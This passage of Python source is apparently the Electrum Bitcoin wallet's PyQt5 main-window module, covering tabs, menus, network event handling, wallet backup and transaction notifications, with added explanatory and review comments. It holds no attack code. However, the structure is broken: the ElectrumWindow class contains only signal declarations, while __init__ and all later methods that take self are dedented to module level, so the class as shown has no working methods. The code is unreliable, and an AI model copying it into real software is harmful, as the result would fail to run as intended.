#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
    """Small flat icon button used in the status bar; activates on click or Return/Enter."""

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func  # callback invoked on activation
        self.setIconSize(QSize(25,25))
        self.setCursor(QCursor(Qt.PointingHandCursor))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        # Fix: also accept the numeric-keypad Enter key, and delegate every
        # other key to QPushButton instead of silently swallowing it (the
        # original dropped Space activation and focus navigation).
        if e.key() in (Qt.Key_Return, Qt.Key_Enter):
            self.func()
        else:
            super().keyPressEvent(e)
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
    # Qt signals used to marshal events from network/worker threads onto the
    # GUI thread (cross-thread emissions are delivered via the Qt event loop).
    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    new_fx_quotes_signal = pyqtSignal()
    new_fx_history_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)  # (event name, args tuple)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
    """Build the main wallet window: state, tabs, menus, shortcuts, network hooks.

    gui_object -- application-level GUI controller (owns daemon, tray, timer)
    wallet     -- the wallet displayed by this window
    """
    QMainWindow.__init__(self)
    self.gui_object = gui_object
    self.config = config = gui_object.config  # type: SimpleConfig
    self.gui_thread = gui_object.gui_thread
    self.setup_exception_hook()
    self.network = gui_object.daemon.network  # type: Network
    assert wallet, "no wallet"
    self.wallet = wallet
    self.fx = gui_object.daemon.fx  # type: FxThread
    self.invoices = wallet.invoices
    self.contacts = wallet.contacts
    self.tray = gui_object.tray
    self.app = gui_object.app
    self.cleaned_up = False
    self.payment_request = None  # currently-loaded payment request, if any
    self.checking_accounts = False
    self.qr_window = None
    self.not_enough_funds = False
    self.pluginsdialog = None
    self.require_fee_update = False
    self.tl_windows = []  # stack of top-level dialog windows (see push_top_level_window)
    self.tx_external_keypairs = {}
    Logger.__init__(self)
    # Transactions queued by the network thread, drained by notify_transactions().
    self.tx_notification_queue = queue.Queue()
    self.tx_notification_last_time = 0
    self.create_status_bar()
    self.need_update = threading.Event()
    self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
    try:
        decimal_point_to_base_unit_name(self.decimal_point)
    except UnknownBaseUnit:
        self.decimal_point = DECIMAL_POINT_DEFAULT
    self.num_zeros = int(config.get('num_zeros', 0))
    self.completions = QStringListModel()
    # Build the tab set; optional tabs are only shown when enabled in config.
    self.tabs = tabs = QTabWidget(self)
    self.send_tab = self.create_send_tab()
    self.receive_tab = self.create_receive_tab()
    self.addresses_tab = self.create_addresses_tab()
    self.utxo_tab = self.create_utxo_tab()
    self.console_tab = self.create_console_tab()
    self.contacts_tab = self.create_contacts_tab()
    tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
    tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
    tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))

    def add_optional_tab(tabs, tab, icon, description, name):
        # Stash metadata used later by toggle_tab() to re-insert in stable order.
        tab.tab_icon = icon
        tab.tab_description = description
        tab.tab_pos = len(tabs)
        tab.tab_name = name
        if self.config.get('show_{}_tab'.format(name), False):
            tabs.addTab(tab, icon, description.replace("&", ""))

    add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
    add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
    add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
    add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
    tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
    self.setCentralWidget(tabs)
    if self.config.get("is_maximized"):
        self.showMaximized()
    self.setWindowIcon(read_QIcon("electrum.png"))
    self.init_menubar()
    # Keyboard shortcuts; wrtabs is a weak proxy so the lambdas below do not
    # keep the tab widget (and hence this window) alive after close.
    wrtabs = weakref.proxy(tabs)
    QShortcut(QKeySequence("Ctrl+W"), self, self.close)
    QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
    QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
    QShortcut(QKeySequence("F5"), self, self.update_wallet)
    QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
    QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
    for i in range(wrtabs.count()):
        # i=i binds the loop variable now (avoids the late-binding closure pitfall)
        QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
    self.payment_request_ok_signal.connect(self.payment_request_ok)
    self.payment_request_error_signal.connect(self.payment_request_error)
    self.history_list.setFocus(True)
    # network callbacks
    if self.network:
        self.network_signal.connect(self.on_network_qt)
        interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                     'new_transaction', 'status',
                     'banner', 'verified', 'fee', 'fee_histogram']
        # To avoid leaking references to "self" that prevent the
        # window from being GC-ed when closed, callbacks should be
        # methods of this class only, and specifically not be
        # partials, lambdas or methods of subobjects. Hence...
        self.network.register_callback(self.on_network, interests)
        # set initial message
        self.console.showMessage(self.network.banner)
        self.network.register_callback(self.on_quotes, ['on_quotes'])
        self.network.register_callback(self.on_history, ['on_history'])
        self.new_fx_quotes_signal.connect(self.on_fx_quotes)
        self.new_fx_history_signal.connect(self.on_fx_history)
    # update fee slider in case we missed the callback
    self.fee_slider.update()
    self.load_wallet(wallet)
    gui_object.timer.timeout.connect(self.timer_actions)
    self.fetch_alias()
    # If the option hasn't been set yet
    if config.get('check_updates') is None:
        choice = self.question(title="Electrum - " + _("Enable update check"),
                               msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                   _("Would you like to be notified when there is a newer version of Electrum available?"))
        config.set_key('check_updates', bool(choice), save=True)
    if config.get('check_updates', False):
        # The references to both the thread and the window need to be stored somewhere
        # to prevent GC from getting in our way.
        def on_version_received(v):
            if UpdateCheck.is_newer(v):
                self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                self.update_check_button.show()
        self._update_check_thread = UpdateCheckThread(self)
        self._update_check_thread.checked.connect(on_version_received)
        self._update_check_thread.start()
def on_history(self, b):
    # Network-thread callback: invalidate cached fiat prices, then hand the
    # GUI refresh off to the main thread via the signal.
    self.wallet.clear_coin_price_cache()
    self.new_fx_history_signal.emit()
def setup_exception_hook(self):
    # Install the crash-reporter hook for uncaught exceptions in this window.
    Exception_Hook(self)
def on_fx_history(self):
    # GUI-thread handler: redraw history and address list with new fiat history rates.
    self.history_model.refresh('fx_history')
    self.address_list.update()
def on_quotes(self, b):
    # Network-thread callback: forward to the GUI thread via signal.
    self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
    """GUI-thread handler for fresh exchange-rate quotes."""
    self.update_status()
    # For each fiat/BTC pair, re-emit textEdited on whichever side was edited
    # last so the other side is recomputed with the new rate.
    for fiat_edit, btc_edit in ((self.fiat_send_e, self.amount_e),
                                (self.fiat_receive_e, self.receive_amount_e)):
        edit = fiat_edit if fiat_edit.is_last_edited else btc_edit
        edit.textEdited.emit(edit.text())
    # History tab needs updating if it used spot
    if self.fx.history_used_spot:
        self.history_model.refresh('fx_quotes')
        self.address_list.update()
def toggle_tab(self, tab):
    """Show or hide an optional tab and persist the choice in the config."""
    show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
    self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
    tab.menu_action.setText((_("Hide {}") if show else _("Show {}")).format(tab.tab_description))
    if not show:
        self.tabs.removeTab(self.tabs.indexOf(tab))
        return
    # Insert before the first visible optional tab with a larger nominal
    # position, so optional tabs keep a stable relative order.
    index = len(self.tabs)
    for i in range(len(self.tabs)):
        other_pos = getattr(self.tabs.widget(i), 'tab_pos', None)
        if other_pos is not None and tab.tab_pos < other_pos:
            index = i
            break
    self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
def push_top_level_window(self, window):
    '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
    parented. This used to be done by explicitly providing the parent
    window, but that isn't something hardware wallet prompts know.'''
    # Paired with pop_top_level_window(); top_level_window() reads the stack.
    self.tl_windows.append(window)
def pop_top_level_window(self, window):
    # Counterpart of push_top_level_window().
    self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
    '''Do the right thing in the presence of tx dialog windows'''
    override = None
    if self.tl_windows:
        candidate = self.tl_windows[-1]
        # Only use the override when it satisfies the caller's filter (if any).
        if not test_func or test_func(candidate):
            override = candidate
    return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
    """Short name used to tag this window's log lines."""
    #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
    return self.wallet.diagnostic_name()
def is_hidden(self):
    """True when the window is minimized or not visible."""
    minimized = self.isMinimized()
    hidden = self.isHidden()
    return minimized or hidden
def show_or_hide(self):
    """Toggle window visibility (used from the system tray)."""
    if not self.is_hidden():
        self.hide()
    else:
        self.bring_to_top()
def bring_to_top(self):
    # Unhide and raise above sibling windows.
    self.show()
    self.raise_()
def on_error(self, exc_info):
    """Report an exception to the user; deliberate cancellations stay silent."""
    exc = exc_info[1]
    if isinstance(exc, UserCancelled):
        return
    if isinstance(exc, UserFacingException):
        self.show_error(str(exc))
        return
    # Unexpected error: log it (best effort), then show it.
    try:
        self.logger.error("on_error", exc_info=exc_info)
    except OSError:
        pass  # see #4418
    self.show_error(str(exc))
def on_network(self, event, *args):
    """Network-thread callback: route events toward the GUI thread.

    Runs on the network thread, so it must not touch Qt widgets directly;
    it only sets flags, queues work, or emits signals.
    """
    if event == 'wallet_updated':
        wallet = args[0]
        if wallet == self.wallet:
            self.need_update.set()
    elif event == 'network_updated':
        self.gui_object.network_updated_signal_obj.network_updated_signal \
            .emit(event, args)
        self.network_signal.emit('status', None)
    elif event == 'blockchain_updated':
        # to update number of confirmations in history
        self.need_update.set()
    elif event == 'new_transaction':
        wallet, tx = args
        if wallet == self.wallet:
            # Queued for the rate-limited notify_transactions() poll.
            self.tx_notification_queue.put(tx)
    elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
        # Handle in GUI thread
        self.network_signal.emit(event, args)
    else:
        self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
    # Handle a network message in the GUI thread
    if event == 'status':
        self.update_status()
    elif event == 'banner':
        self.console.showMessage(args[0])
    elif event == 'verified':
        wallet, tx_hash, tx_mined_status = args
        if wallet == self.wallet:
            self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
    elif event == 'fee':
        if self.config.is_dynfee():
            self.fee_slider.update()
            self.require_fee_update = True
    elif event == 'fee_histogram':
        if self.config.is_dynfee():
            self.fee_slider.update()
            self.require_fee_update = True
        # The histogram also affects fee display in the history model.
        self.history_model.on_fee_histogram()
    else:
        self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
    """Resolve the configured OpenAlias in a background thread.

    Sets self.alias_info and emits alias_received_signal when the (network)
    resolution finishes.
    """
    self.alias_info = None
    alias = self.config.get('alias')
    if alias:
        alias = str(alias)
        def f():
            self.alias_info = self.contacts.resolve_openalias(alias)
            self.alias_received_signal.emit()
        t = threading.Thread(target=f)
        # Daemon thread so a pending lookup cannot block interpreter exit.
        # (Thread.setDaemon() is deprecated; assign the attribute instead.)
        t.daemon = True
        t.start()
def close_wallet(self):
    # Notify plugins before this window's wallet goes away.
    if self.wallet:
        self.logger.info(f'close_wallet {self.wallet.storage.path}')
    run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
    """Finish window initialisation once the wallet object is available."""
    wallet.thread = TaskThread(self, self.on_error)
    self.update_recently_visited(wallet.storage.path)
    self.need_update.set()
    # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
    # update menus
    self.seed_menu.setEnabled(self.wallet.has_seed())
    self.update_lock_icon()
    self.update_buttons_on_seed()
    self.update_console()
    self.clear_receive_tab()
    self.request_list.update()
    self.tabs.show()
    self.init_geometry()
    # Respect the 'start minimised to tray' option.
    if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
        self.hide()
    else:
        self.show()
    self.watching_only_changed()
    run_hook('load_wallet', wallet, self)
    try:
        wallet.try_detecting_internal_addresses_corruption()
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        send_exception_to_crash_reporter(e)
def init_geometry(self):
    """Restore the saved window geometry, or fall back to a sane default."""
    winpos = self.wallet.storage.get("winpos-qt")
    try:
        screen = self.app.desktop().screenGeometry()
        assert screen.contains(QRect(*winpos))
        self.setGeometry(*winpos)
    # Narrowed from a bare 'except:': we expect TypeError (winpos missing or
    # malformed) or AssertionError (saved position is off-screen); a bare
    # except would also swallow KeyboardInterrupt/SystemExit.
    except Exception:
        self.logger.info("using default geometry")
        self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
    """Refresh the title bar and menu availability after the wallet's watching-only state changes."""
    parts = [self.wallet.storage.get('wallet_type', '?')]
    if self.wallet.is_watching_only():
        parts.append(_('watching only'))
    base = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
    title = '%s %s - %s' % (base, ELECTRUM_VERSION,
                            self.wallet.basename())
    title += ' [%s]'% ', '.join(parts)
    self.setWindowTitle(title)
    # Disable/hide menu entries that make no sense for this wallet type.
    self.password_menu.setEnabled(self.wallet.may_have_password())
    self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
    self.import_address_menu.setVisible(self.wallet.can_import_address())
    self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
    """Pop a warning dialog when the wallet cannot spend (watching-only)."""
    if self.wallet.is_watching_only():
        msg = ' '.join([
            _("This wallet is watching-only."),
            _("This means you will not be able to spend Bitcoins with it."),
            _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
        ])
        self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
    """Show a once-per-process testnet warning, with a 'don't show again' opt-out."""
    if not constants.net.TESTNET:
        return
    # user might have opted out already
    if self.config.get('dont_show_testnet_warning', False):
        return
    # only show once per process lifecycle
    if getattr(self.gui_object, '_warned_testnet', False):
        return
    self.gui_object._warned_testnet = True
    msg = ''.join([
        _("You are in testnet mode."), ' ',
        _("Testnet coins are worthless."), '\n',
        _("Testnet is separate from the main Bitcoin network. It is used for testing.")
    ])
    cb = QCheckBox(_("Don't show this again."))
    cb_checked = False
    def on_cb(x):
        # Record the checkbox state; it is read after the dialog closes.
        nonlocal cb_checked
        cb_checked = x == Qt.Checked
    cb.stateChanged.connect(on_cb)
    self.show_warning(msg, title=_('Testnet'), checkbox=cb)
    if cb_checked:
        self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
    """Prompt for a wallet file and open it in a new window."""
    try:
        wallet_folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
    if filename:
        self.gui_object.new_window(filename)
def backup_wallet(self):
    """Copy the wallet file to a user-chosen location."""
    path = self.wallet.storage.path
    wallet_folder = os.path.dirname(path)
    filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
    if not filename:
        return
    new_path = os.path.join(wallet_folder, filename)
    if new_path != path:
        try:
            # copy2 also preserves file metadata (timestamps, permissions).
            shutil.copy2(path, new_path)
            self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
        # NOTE(review): BaseException looks deliberately broad (any failure
        # should surface as a dialog), but it also catches KeyboardInterrupt
        # and SystemExit — confirm whether Exception would suffice.
        except BaseException as reason:
            self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
    """Move *filename* to the front of the recently-open list and rebuild the menu."""
    recent = self.config.get('recently_open', [])
    try:
        sorted(recent)  # sanity check: the stored value is a sortable list
    # Narrowed from a bare 'except:': a corrupt config value raises TypeError
    # here; a bare except would also swallow KeyboardInterrupt/SystemExit.
    except (TypeError, ValueError):
        recent = []
    if filename in recent:
        recent.remove(filename)
    recent.insert(0, filename)
    # Keep only paths that still exist, capped at the five most recent.
    recent = [path for path in recent if os.path.exists(path)]
    recent = recent[:5]
    self.config.set_key('recently_open', recent)
    self.recently_visited_menu.clear()
    for i, k in enumerate(sorted(recent)):
        b = os.path.basename(k)
        def loader(k):
            # Bind k now; a plain lambda in the loop would late-bind it.
            return lambda: self.gui_object.new_window(k)
        self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
    self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
    """Return the directory containing the current wallet file."""
    return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
    """Pick a fresh wallet filename and launch the creation/restore wizard."""
    try:
        wallet_folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    full_path = os.path.join(wallet_folder, get_new_wallet_name(wallet_folder))
    self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
    """Create the window's menu bar (File / Wallet / View / Tools / Help)."""
    menubar = QMenuBar()
    # --- File menu ---
    file_menu = menubar.addMenu(_("&File"))
    self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
    file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
    file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
    file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
    file_menu.addAction(_("Delete"), self.remove_wallet)
    file_menu.addSeparator()
    file_menu.addAction(_("&Quit"), self.close)
    # --- Wallet menu (entries kept as attributes are toggled elsewhere,
    #     e.g. by watching_only_changed) ---
    wallet_menu = menubar.addMenu(_("&Wallet"))
    wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
    wallet_menu.addSeparator()
    self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
    self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
    self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
    self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
    self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
    self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
    self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
    wallet_menu.addSeparator()
    addresses_menu = wallet_menu.addMenu(_("&Addresses"))
    addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
    labels_menu = wallet_menu.addMenu(_("&Labels"))
    labels_menu.addAction(_("&Import"), self.do_import_labels)
    labels_menu.addAction(_("&Export"), self.do_export_labels)
    history_menu = wallet_menu.addMenu(_("&History"))
    history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
    history_menu.addAction(_("&Summary"), self.history_list.show_summary)
    history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
    history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
    contacts_menu = wallet_menu.addMenu(_("Contacts"))
    contacts_menu.addAction(_("&New"), self.new_contact_dialog)
    contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
    contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
    invoices_menu = wallet_menu.addMenu(_("Invoices"))
    invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
    invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
    wallet_menu.addSeparator()
    wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))

    # --- View menu: one toggle per optional tab ---
    def add_toggle_action(view_menu, tab):
        is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
        item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
        tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))

    view_menu = menubar.addMenu(_("&View"))
    add_toggle_action(view_menu, self.addresses_tab)
    add_toggle_action(view_menu, self.utxo_tab)
    add_toggle_action(view_menu, self.contacts_tab)
    add_toggle_action(view_menu, self.console_tab)
    # --- Tools menu ---
    tools_menu = menubar.addMenu(_("&Tools"))
    # Settings / Preferences are all reserved keywords in macOS using this as work around
    tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
    tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
    tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
    tools_menu.addSeparator()
    tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
    tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
    tools_menu.addSeparator()
    paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
    raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
    raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
    raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
    raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
    raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
    self.raw_transaction_menu = raw_transaction_menu
    run_hook('init_menubar_tools', self, tools_menu)
    # --- Help menu ---
    help_menu = menubar.addMenu(_("&Help"))
    help_menu.addAction(_("&About"), self.show_about)
    help_menu.addAction(_("&Check for updates"), self.show_update_check)
    help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
    help_menu.addSeparator()
    help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
    help_menu.addAction(_("&Report Bug"), self.show_report_bug)
    help_menu.addSeparator()
    help_menu.addAction(_("&Donate to server"), self.donate_to_server)
    self.setMenuBar(menubar)
def donate_to_server(self):
    """Open a payment to the current server's donation address, if it advertises one."""
    d = self.network.get_donation_address()
    if not d:
        self.show_error(_('No donation address for this server'))
        return
    host = self.network.get_parameters().host
    self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
def show_about(self):
    """Show the standard About dialog."""
    QMessageBox.about(self, "Electrum",
                      (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                       _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
                       _("You do not need to perform regular backups, because your wallet can be "
                         "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                       _("Startup times are instant because it operates in conjunction with high-performance "
                         "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
                       _("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
    # Keep a reference on gui_object so the dialog is not garbage-collected.
    self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
    """Show instructions for filing a bug report on GitHub."""
    msg = ' '.join([
        _("Please report any bugs as issues on github:<br/>"),
        "<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
        _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
        _("Try to explain not only what the bug is, but how it occurs.")
    ])
    self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
    """Show a tray notification for freshly received transactions (rate-limited)."""
    if self.tx_notification_queue.qsize() == 0:
        return
    if not self.wallet.up_to_date:
        return  # no notifications while syncing
    now = time.time()
    rate_limit = 20  # seconds
    if self.tx_notification_last_time + rate_limit > now:
        return
    self.tx_notification_last_time = now
    self.logger.info("Notifying GUI about new transactions")
    txns = []
    # Drain everything the network callback queued since the last poll.
    while True:
        try:
            txns.append(self.tx_notification_queue.get_nowait())
        except queue.Empty:
            break
    # Combine the transactions if there are at least three
    if len(txns) >= 3:
        total_amount = 0
        for tx in txns:
            is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
            if not is_relevant:
                continue
            total_amount += v
        self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                    .format(len(txns), self.format_amount_and_units(total_amount)))
    else:
        for tx in txns:
            is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
            if not is_relevant:
                continue
            self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
    """Show a system-tray balloon message."""
    if self.tray:
        try:
            # this requires Qt 5.9
            self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
        except TypeError:
            # Older Qt: fall back to the stock information icon.
            self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
    """Open-file dialog starting in the last-used directory; remembers the new one."""
    last_dir = self.config.get('io_dir', os.path.expanduser('~'))
    fileName, __ = QFileDialog.getOpenFileName(self, title, last_dir, filter)
    if fileName and last_dir != os.path.dirname(fileName):
        self.config.set_key('io_dir', os.path.dirname(fileName), True)
    return fileName
def getSaveFileName(self, title, filename, filter = ""):
    """Save-file dialog seeded with *filename* in the last-used directory; remembers the new one."""
    last_dir = self.config.get('io_dir', os.path.expanduser('~'))
    suggested = os.path.join(last_dir, filename)
    fileName, __ = QFileDialog.getSaveFileName(self, title, suggested, filter)
    if fileName and last_dir != os.path.dirname(fileName):
        self.config.set_key('io_dir', os.path.dirname(fileName), True)
    return fileName
def timer_actions(self):
    """Periodic work driven by the application timer."""
    # Note this runs in the GUI thread
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    elif not self.wallet.up_to_date:
        # this updates "synchronizing" progress
        self.update_status()
    # resolve aliases
    # FIXME this is a blocking network call that has a timeout of 5 sec
    self.payto_e.resolve()
    # update fee
